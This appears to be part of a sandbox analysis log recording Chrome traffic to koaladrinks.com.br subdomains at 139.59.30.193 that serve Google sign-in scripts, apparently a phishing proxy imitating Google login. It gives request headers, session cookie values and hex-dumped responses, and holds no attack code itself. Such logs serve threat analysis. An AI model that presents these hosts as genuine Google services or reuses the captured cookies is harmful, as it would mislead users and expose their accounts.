                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-arch: "x86"
                                                      sec-ch-ua-full-version: "117.0.5938.134"
                                                      sec-ch-ua-platform-version: "10.0.0"
                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                      sec-ch-ua-bitness: "64"
                                                      sec-ch-ua-model: ""
                                                      sec-ch-ua-wow64: ?0
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Sec-Fetch-Site: same-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: script
                                                      Referer: https://ijgbload.koaladrinks.com.br/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202; NID=520=WW16bk8xhCKjLDzRMeKzleiHWeQ91IpeSlEndb-VpZL_gD5Yk1zwK_l2GrQDgUalD8_AM6emji9sq9EGwuKfaPf88fJvThafZPIhylhin4dskLYLY1kD5NOTq8DD0VvF9XJIuZfO5U2GVyp-Wh9bwFsZBcTa3CrR_i6GMtJcVhv0q92EBc4
                                                      2025-01-10 08:28:00 UTC17INHTTP/1.1 200 OK
                                                      2025-01-10 08:28:00 UTC22INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a
                                                      Data Ascii: Accept-Ranges: bytes
                                                      2025-01-10 08:28:00 UTC57INData Raw: 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 0d 0a
                                                      Data Ascii: Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      2025-01-10 08:28:00 UTC35INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 0d 0a
                                                      Data Ascii: Cache-Control: no-cache, no-store
                                                      2025-01-10 08:28:00 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                      Data Ascii: Connection: close
                                                      2025-01-10 08:28:00 UTC46INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a
                                                      Data Ascii: Content-Type: text/javascript; charset=UTF-8
                                                      2025-01-10 08:28:00 UTC92INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 4f 70 65 6e 65 72 2d 50 6f 6c 69 63 79 3a 20 73 61 6d 65 2d 6f 72 69 67 69 6e 3b 20 72 65 70 6f 72 74 2d 74 6f 3d 22 62 6f 71 2d 69 6e 66 72 61 2f 69 64 65 6e 74 69 74 79 2d 62 6f 71 2d 6a 73 2d 63 73 73 2d 73 69 67 6e 65 72 73 22 0d 0a
                                                      Data Ascii: Cross-Origin-Opener-Policy: same-origin; report-to="boq-infra/identity-boq-js-css-signers"
                                                      2025-01-10 08:28:00 UTC44INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 52 65 73 6f 75 72 63 65 2d 50 6f 6c 69 63 79 3a 20 63 72 6f 73 73 2d 6f 72 69 67 69 6e 0d 0a
                                                      Data Ascii: Cross-Origin-Resource-Policy: cross-origin
                                                      2025-01-10 08:28:00 UTC37INData Raw: 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 38 3a 32 38 3a 30 30 20 47 4d 54 0d 0a
                                                      Data Ascii: Date: Fri, 10 Jan 2025 08:28:00 GMT
                                                      2025-01-10 08:28:00 UTC40INData Raw: 45 78 70 69 72 65 73 3a 20 53 61 74 2c 20 31 30 20 4a 61 6e 20 32 30 32 36 20 30 38 3a 32 38 3a 30 30 20 47 4d 54 0d 0a
                                                      Data Ascii: Expires: Sat, 10 Jan 2026 08:28:00 GMT
                                                      2025-01-10 08:28:00 UTC46INData Raw: 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 46 72 69 2c 20 30 33 20 4a 61 6e 20 32 30 32 35 20 32 33 3a 35 39 3a 32 32 20 47 4d 54 0d 0a
                                                      Data Ascii: Last-Modified: Fri, 03 Jan 2025 23:59:22 GMT


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      76192.168.2.949805139.59.30.1934432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:28:01 UTC2087OUTGET /_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.GVgXMoL7NYg.es5.O/ck=boq-identity.AccountsSignInUi.0kxUC5tMpvM.L.B1.O/am=yQ2mZLgGABD_cGlAN6BIIGQAAAAAAAAAAMAGAACwww/d=1/exm=A7fCU,AvtSve,CMcBD,E87wgc,EFQ78c,EN3i8d,Fndnac,I6YDgd,IZT63,K0PMbc,K1ZKnb,KUM7Z,L1AAkb,L9OGUe,LDQI,LEikZe,LvGhrf,MpJwZc,NOeYWe,NTMZac,NwH0H,O6y8ed,OTA3Ae,P6sQOc,PHUIyb,PrPYRd,RMhBfe,Rkm0ef,RqjULd,SCuOPb,SD8Jgb,STuCOe,SpsfSb,Tbb4sb,UUJqVe,Uas9Hd,WpP9Yc,YHI3We,YTxL4,YgOFye,ZDZcre,ZZ4WUe,ZwDk9d,_b,_tp,aC1iue,aW3pY,b3kMqb,bSspM,bTi8wc,byfTOb,cYShmd,cciGGe,f8Gu1e,hc6Ubd,iAskyc,inNHtf,lsjVmc,ltDFwf,lwddkf,m9oV,mvkUhe,n73qwf,oLggrd,oqkvIf,p3hmRc,pxq3x,q0xTif,qPYxq,qmdT9,rmumx,rv9FVb,sOXFj,siKnQd,soHxf,t2srLd,tUnxGc,vHEMJe,vfuNJf,vjKJJ,w9hDv,wg1P6b,ws9Tlc,xBaz7b,xQtZb,xUdipf,xiZRqc,y5vRwf,yRXbo,ywOR5c,z0u0L,zbML3c,ziXSP,ziZ8Mc,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlFCOKoBBerVGlbnsaabvKJ7jkr4hA/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;L [TRUNCATED]
                                                      Host: www3.koaladrinks.com.br
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202; NID=520=WW16bk8xhCKjLDzRMeKzleiHWeQ91IpeSlEndb-VpZL_gD5Yk1zwK_l2GrQDgUalD8_AM6emji9sq9EGwuKfaPf88fJvThafZPIhylhin4dskLYLY1kD5NOTq8DD0VvF9XJIuZfO5U2GVyp-Wh9bwFsZBcTa3CrR_i6GMtJcVhv0q92EBc4
                                                      2025-01-10 08:28:02 UTC17INHTTP/1.1 200 OK
                                                      2025-01-10 08:28:02 UTC22INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a
                                                      Data Ascii: Accept-Ranges: bytes
                                                      2025-01-10 08:28:02 UTC12INData Raw: 41 67 65 3a 20 32 32 39 33 35 0d 0a
                                                      Data Ascii: Age: 22935
                                                      2025-01-10 08:28:02 UTC57INData Raw: 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 0d 0a
                                                      Data Ascii: Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      2025-01-10 08:28:02 UTC35INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 0d 0a
                                                      Data Ascii: Cache-Control: no-cache, no-store
                                                      2025-01-10 08:28:02 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                      Data Ascii: Connection: close
                                                      2025-01-10 08:28:02 UTC46INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a
                                                      Data Ascii: Content-Type: text/javascript; charset=UTF-8
                                                      2025-01-10 08:28:02 UTC92INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 4f 70 65 6e 65 72 2d 50 6f 6c 69 63 79 3a 20 73 61 6d 65 2d 6f 72 69 67 69 6e 3b 20 72 65 70 6f 72 74 2d 74 6f 3d 22 62 6f 71 2d 69 6e 66 72 61 2f 69 64 65 6e 74 69 74 79 2d 62 6f 71 2d 6a 73 2d 63 73 73 2d 73 69 67 6e 65 72 73 22 0d 0a
                                                      Data Ascii: Cross-Origin-Opener-Policy: same-origin; report-to="boq-infra/identity-boq-js-css-signers"
                                                      2025-01-10 08:28:02 UTC44INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 52 65 73 6f 75 72 63 65 2d 50 6f 6c 69 63 79 3a 20 63 72 6f 73 73 2d 6f 72 69 67 69 6e 0d 0a
                                                      Data Ascii: Cross-Origin-Resource-Policy: cross-origin
                                                      2025-01-10 08:28:02 UTC37INData Raw: 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 32 3a 30 35 3a 34 36 20 47 4d 54 0d 0a
                                                      Data Ascii: Date: Fri, 10 Jan 2025 02:05:46 GMT
                                                      2025-01-10 08:28:02 UTC40INData Raw: 45 78 70 69 72 65 73 3a 20 53 61 74 2c 20 31 30 20 4a 61 6e 20 32 30 32 36 20 30 32 3a 30 35 3a 34 36 20 47 4d 54 0d 0a
                                                      Data Ascii: Expires: Sat, 10 Jan 2026 02:05:46 GMT


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      77192.168.2.949806139.59.30.1934432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:28:02 UTC667OUTGET /log?format=json&hasfast=true&authuser=0 HTTP/1.1
                                                      Host: play.koaladrinks.com.br
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202; NID=520=lkWVP3fYTb6No5K28t33KLTJAz6rzi8wdnjs9Q40yNIRPFVTDHY7LYJXJ4ayTicwVFq4nPmmNudajCmGFoHD4PwXYcfvGD-roP2c4yvsifrZzv3dD3oB_2Qv1CD_z3zAxrIstxmapOr4sjpqYwe_VBzwC5LvBOxfGozPicZNq0f1Thq0thJ0KJMi2ik
                                                      2025-01-10 08:28:02 UTC26INHTTP/1.1 400 Bad Request
                                                      2025-01-10 08:28:02 UTC57INData Raw: 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 0d 0a
                                                      Data Ascii: Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      2025-01-10 08:28:02 UTC35INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 0d 0a
                                                      Data Ascii: Cache-Control: no-cache, no-store
                                                      2025-01-10 08:28:02 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                      Data Ascii: Connection: close
                                                      2025-01-10 08:28:02 UTC40INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a
                                                      Data Ascii: Content-Type: text/html; charset=UTF-8
                                                      2025-01-10 08:28:02 UTC37INData Raw: 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 38 3a 32 38 3a 30 32 20 47 4d 54 0d 0a
                                                      Data Ascii: Date: Fri, 10 Jan 2025 08:28:02 GMT
                                                      2025-01-10 08:28:02 UTC17INData Raw: 53 65 72 76 65 72 3a 20 50 6c 61 79 6c 6f 67 0d 0a
                                                      Data Ascii: Server: Playlog
                                                      2025-01-10 08:28:02 UTC28INData Raw: 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a
                                                      Data Ascii: Transfer-Encoding: chunked
                                                      2025-01-10 08:28:02 UTC2INData Raw: 0d 0a
                                                      Data Ascii:
                                                      2025-01-10 08:28:02 UTC5INData Raw: 36 34 39 0d 0a
                                                      Data Ascii: 649
                                                      2025-01-10 08:28:02 UTC1609INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 30 20 28 42 61 64 20 52 65 71 75 65 73 74 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d
                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 400 (Bad Request)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      78192.168.2.949807139.59.30.1934432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:28:02 UTC2614OUTGET /_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.GVgXMoL7NYg.es5.O/ck=boq-identity.AccountsSignInUi.0kxUC5tMpvM.L.B1.O/am=yQ2mZLgGABD_cGlAN6BIIGQAAAAAAAAAAMAGAACwww/d=1/exm=A7fCU,AvtSve,CMcBD,E87wgc,EFQ78c,EN3i8d,FCpbqb,Fndnac,I6YDgd,IZT63,K0PMbc,K1ZKnb,KUM7Z,L1AAkb,L9OGUe,LDQI,LEikZe,LvGhrf,MpJwZc,NOeYWe,NTMZac,NwH0H,O6y8ed,OTA3Ae,OTcFib,P6sQOc,PHUIyb,PXsWy,PrPYRd,RMhBfe,Rkm0ef,RqjULd,SCuOPb,SD8Jgb,STuCOe,SpsfSb,Tbb4sb,UUJqVe,Uas9Hd,WhJNk,WpP9Yc,Wt6vjf,YHI3We,YTxL4,YgOFye,ZDZcre,ZZ4WUe,ZwDk9d,_b,_tp,aC1iue,aW3pY,b3kMqb,bSspM,bTi8wc,byfTOb,cYShmd,cciGGe,f8Gu1e,hc6Ubd,hhhU8,iAskyc,inNHtf,jGvTv,lsjVmc,ltDFwf,lwddkf,m9oV,mvkUhe,n73qwf,oLggrd,oqkvIf,p3hmRc,pxq3x,q0xTif,qPYxq,qmdT9,rmumx,rv9FVb,sOXFj,siKnQd,soHxf,t2srLd,tUnxGc,vHEMJe,vfuNJf,vjKJJ,w9hDv,wg1P6b,ws9Tlc,xBaz7b,xQtZb,xUdipf,xiZRqc,y5vRwf,yRXbo,ywOR5c,z0u0L,zbML3c,ziXSP,ziZ8Mc,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlFCOKoBBerVGlbnsaabvKJ7jkr4hA/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYl [TRUNCATED]
                                                      Host: www3.koaladrinks.com.br
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-arch: "x86"
                                                      sec-ch-ua-full-version: "117.0.5938.134"
                                                      sec-ch-ua-platform-version: "10.0.0"
                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                      sec-ch-ua-bitness: "64"
                                                      sec-ch-ua-model: ""
                                                      sec-ch-ua-wow64: ?0
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Sec-Fetch-Site: same-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: script
                                                      Referer: https://ijgbload.koaladrinks.com.br/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202; NID=520=lkWVP3fYTb6No5K28t33KLTJAz6rzi8wdnjs9Q40yNIRPFVTDHY7LYJXJ4ayTicwVFq4nPmmNudajCmGFoHD4PwXYcfvGD-roP2c4yvsifrZzv3dD3oB_2Qv1CD_z3zAxrIstxmapOr4sjpqYwe_VBzwC5LvBOxfGozPicZNq0f1Thq0thJ0KJMi2ik
                                                      2025-01-10 08:28:02 UTC17INHTTP/1.1 200 OK
                                                      2025-01-10 08:28:02 UTC22INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a
                                                      Data Ascii: Accept-Ranges: bytes
                                                      2025-01-10 08:28:02 UTC57INData Raw: 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 0d 0a
                                                      Data Ascii: Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      2025-01-10 08:28:02 UTC35INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 0d 0a
                                                      Data Ascii: Cache-Control: no-cache, no-store
                                                      2025-01-10 08:28:02 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                      Data Ascii: Connection: close
                                                      2025-01-10 08:28:02 UTC46INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a
                                                      Data Ascii: Content-Type: text/javascript; charset=UTF-8
                                                      2025-01-10 08:28:02 UTC92INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 4f 70 65 6e 65 72 2d 50 6f 6c 69 63 79 3a 20 73 61 6d 65 2d 6f 72 69 67 69 6e 3b 20 72 65 70 6f 72 74 2d 74 6f 3d 22 62 6f 71 2d 69 6e 66 72 61 2f 69 64 65 6e 74 69 74 79 2d 62 6f 71 2d 6a 73 2d 63 73 73 2d 73 69 67 6e 65 72 73 22 0d 0a
                                                      Data Ascii: Cross-Origin-Opener-Policy: same-origin; report-to="boq-infra/identity-boq-js-css-signers"
                                                      2025-01-10 08:28:02 UTC44INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 52 65 73 6f 75 72 63 65 2d 50 6f 6c 69 63 79 3a 20 63 72 6f 73 73 2d 6f 72 69 67 69 6e 0d 0a
                                                      Data Ascii: Cross-Origin-Resource-Policy: cross-origin
                                                      2025-01-10 08:28:02 UTC37INData Raw: 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 38 3a 32 38 3a 30 32 20 47 4d 54 0d 0a
                                                      Data Ascii: Date: Fri, 10 Jan 2025 08:28:02 GMT
                                                      2025-01-10 08:28:02 UTC40INData Raw: 45 78 70 69 72 65 73 3a 20 53 61 74 2c 20 31 30 20 4a 61 6e 20 32 30 32 36 20 30 38 3a 32 38 3a 30 32 20 47 4d 54 0d 0a
                                                      Data Ascii: Expires: Sat, 10 Jan 2026 08:28:02 GMT
                                                      2025-01-10 08:28:02 UTC46INData Raw: 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 46 72 69 2c 20 30 33 20 4a 61 6e 20 32 30 32 35 20 32 33 3a 35 39 3a 32 32 20 47 4d 54 0d 0a
                                                      Data Ascii: Last-Modified: Fri, 03 Jan 2025 23:59:22 GMT


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      79192.168.2.949809139.59.30.1934432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:28:02 UTC2114OUTGET /_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.GVgXMoL7NYg.es5.O/ck=boq-identity.AccountsSignInUi.0kxUC5tMpvM.L.B1.O/am=yQ2mZLgGABD_cGlAN6BIIGQAAAAAAAAAAMAGAACwww/d=1/exm=A7fCU,AvtSve,CMcBD,E87wgc,EFQ78c,EN3i8d,FCpbqb,Fndnac,I6YDgd,IZT63,K0PMbc,K1ZKnb,KUM7Z,L1AAkb,L9OGUe,LDQI,LEikZe,LvGhrf,MpJwZc,NOeYWe,NTMZac,NwH0H,O6y8ed,OTA3Ae,P6sQOc,PHUIyb,PrPYRd,RMhBfe,Rkm0ef,RqjULd,SCuOPb,SD8Jgb,STuCOe,SpsfSb,Tbb4sb,UUJqVe,Uas9Hd,WhJNk,WpP9Yc,Wt6vjf,YHI3We,YTxL4,YgOFye,ZDZcre,ZZ4WUe,ZwDk9d,_b,_tp,aC1iue,aW3pY,b3kMqb,bSspM,bTi8wc,byfTOb,cYShmd,cciGGe,f8Gu1e,hc6Ubd,hhhU8,iAskyc,inNHtf,lsjVmc,ltDFwf,lwddkf,m9oV,mvkUhe,n73qwf,oLggrd,oqkvIf,p3hmRc,pxq3x,q0xTif,qPYxq,qmdT9,rmumx,rv9FVb,sOXFj,siKnQd,soHxf,t2srLd,tUnxGc,vHEMJe,vfuNJf,vjKJJ,w9hDv,wg1P6b,ws9Tlc,xBaz7b,xQtZb,xUdipf,xiZRqc,y5vRwf,yRXbo,ywOR5c,z0u0L,zbML3c,ziXSP,ziZ8Mc,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlFCOKoBBerVGlbnsaabvKJ7jkr4hA/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;Jsb [TRUNCATED]
                                                      Host: www3.koaladrinks.com.br
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202; NID=520=lkWVP3fYTb6No5K28t33KLTJAz6rzi8wdnjs9Q40yNIRPFVTDHY7LYJXJ4ayTicwVFq4nPmmNudajCmGFoHD4PwXYcfvGD-roP2c4yvsifrZzv3dD3oB_2Qv1CD_z3zAxrIstxmapOr4sjpqYwe_VBzwC5LvBOxfGozPicZNq0f1Thq0thJ0KJMi2ik
                                                      2025-01-10 08:28:02 UTC17INHTTP/1.1 200 OK
                                                      2025-01-10 08:28:02 UTC22INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a
                                                      Data Ascii: Accept-Ranges: bytes
                                                      2025-01-10 08:28:02 UTC8INData Raw: 41 67 65 3a 20 32 0d 0a
                                                      Data Ascii: Age: 2
                                                      2025-01-10 08:28:02 UTC57INData Raw: 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 0d 0a
                                                      Data Ascii: Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      2025-01-10 08:28:02 UTC35INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 0d 0a
                                                      Data Ascii: Cache-Control: no-cache, no-store
                                                      2025-01-10 08:28:02 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                      Data Ascii: Connection: close
                                                      2025-01-10 08:28:02 UTC46INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a
                                                      Data Ascii: Content-Type: text/javascript; charset=UTF-8
                                                      2025-01-10 08:28:02 UTC92INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 4f 70 65 6e 65 72 2d 50 6f 6c 69 63 79 3a 20 73 61 6d 65 2d 6f 72 69 67 69 6e 3b 20 72 65 70 6f 72 74 2d 74 6f 3d 22 62 6f 71 2d 69 6e 66 72 61 2f 69 64 65 6e 74 69 74 79 2d 62 6f 71 2d 6a 73 2d 63 73 73 2d 73 69 67 6e 65 72 73 22 0d 0a
                                                      Data Ascii: Cross-Origin-Opener-Policy: same-origin; report-to="boq-infra/identity-boq-js-css-signers"
                                                      2025-01-10 08:28:02 UTC44INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 52 65 73 6f 75 72 63 65 2d 50 6f 6c 69 63 79 3a 20 63 72 6f 73 73 2d 6f 72 69 67 69 6e 0d 0a
                                                      Data Ascii: Cross-Origin-Resource-Policy: cross-origin
                                                      2025-01-10 08:28:02 UTC37INData Raw: 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 38 3a 32 38 3a 30 30 20 47 4d 54 0d 0a
                                                      Data Ascii: Date: Fri, 10 Jan 2025 08:28:00 GMT
                                                      2025-01-10 08:28:02 UTC40INData Raw: 45 78 70 69 72 65 73 3a 20 53 61 74 2c 20 31 30 20 4a 61 6e 20 32 30 32 36 20 30 38 3a 32 38 3a 30 30 20 47 4d 54 0d 0a
                                                      Data Ascii: Expires: Sat, 10 Jan 2026 08:28:00 GMT


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      80192.168.2.949808139.59.30.1934432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
